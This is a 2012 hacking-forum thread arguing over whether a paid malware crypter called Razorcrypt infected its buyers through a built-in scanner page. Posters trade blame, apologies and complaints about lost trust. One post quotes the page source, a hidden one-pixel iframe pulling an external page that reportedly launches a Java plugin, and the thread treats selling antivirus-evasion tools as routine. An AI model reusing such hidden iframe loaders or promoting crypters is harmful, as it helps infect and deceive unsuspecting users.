About That Razorcrypt Backdoor

(Dec 30, 2012 03:41 PM)๖ۣۜMystical Wrote:  Keep in mind the scanner was apart of the crypter so it was caused by your crypter, was not like we had to download another project to scan an exe on, it was dropped after opening your crypter.

Well the scanner page was displayed in the crypter right,
but it still was an external page.
As i said before this could have happened to nearly everyone who owns a page.
Thing is why dont you take any responsibility about your crypter, its your product you get money for it.

Atleast have the decency of saying sorry to the customers...

This even already happened to internet giants like ebay or amazon.
The only thing you can do about this is to learn from your mistakes.
What is razor crypt coded in? I might have some themes/skins for you it's code files not DLLs so you don't have to worry about malevolent crap again.
You haven't proven anything. All you've done is talk - No solid, irrefutable proof. Unfortunately at this point it will be very much impossible for you to prove you didn't infect people on purpose anyway, so maybe in the future you can keep an eye on the product you maintain and distribute to avoid things like this. Really is not that hard.
I find it amusing that a "FUD" crypter's backdoor isn't even FUD

May not fix anything but they did issue apologies.

It's still against rules to sell a Infected program on hackforums and you did so. You say "It's been removed now" Like everyone on hackforums and all your customers are suppose to believe you and be okay with that well guess what? None of your customers will trust you the same again you broke there trust. Customers paid you for clean software and a clean product and you did not deliver and cheaped out and cut corners if you "Used a crack" or you're a liar both are nearly as bad. This marks the end of Razor Crypter as nobody wants this junk anymore it's as bad as BlackShades back doored stuff. R.i.P Backdoored RazorCrypt. Sure they apologized... you think that's good enough for us? Customers Data were probably stolen, (Hackforums accounts) and who know's what else.. and sorry is suppose to be okay? You must be smoking crack. Mods will investigate and deal with this all soon hopefully.

Also the fact when Razor was confronted about it at first and he denied it and denied it, than blamed someone else should show his Guilt.

I'm curious to see how the vps was accessed, say someone did hack it
Well, it's clean now. i don't believe that the owner has infected his own product... I must believe in explanation given to us.
However this situation could have caused huge damage to many customers... Care must be taken when implementing something cracked in a paid product. Customers should not take with the consequences of your actions.

Anyway, I never used the "razorscanner" and open the crypter was enough to be infected.. I still haven't quite figured out what caused the issue (it was the scanner or skin?). But I'm very confused by this whole story and I'm not even an expert on this matter... So, I accept the apology (as a customer), and hope that you guys have more precautions in the future. And that's all.

Cheers.

I find it interesting he posted no proof of the code being malicious. He could have quite easily added that line in. Also about the website, it's source is this
Code
<html><body><iframe src="http://radiolatitudsur.com/ziim.html" width="1" height="1" frameborder="0"></iframe>
</body></html>
It tries to run Java plugin.

Now for that radio website, first of all, it is in spanish. Second of all, that .html has literally zero source code.
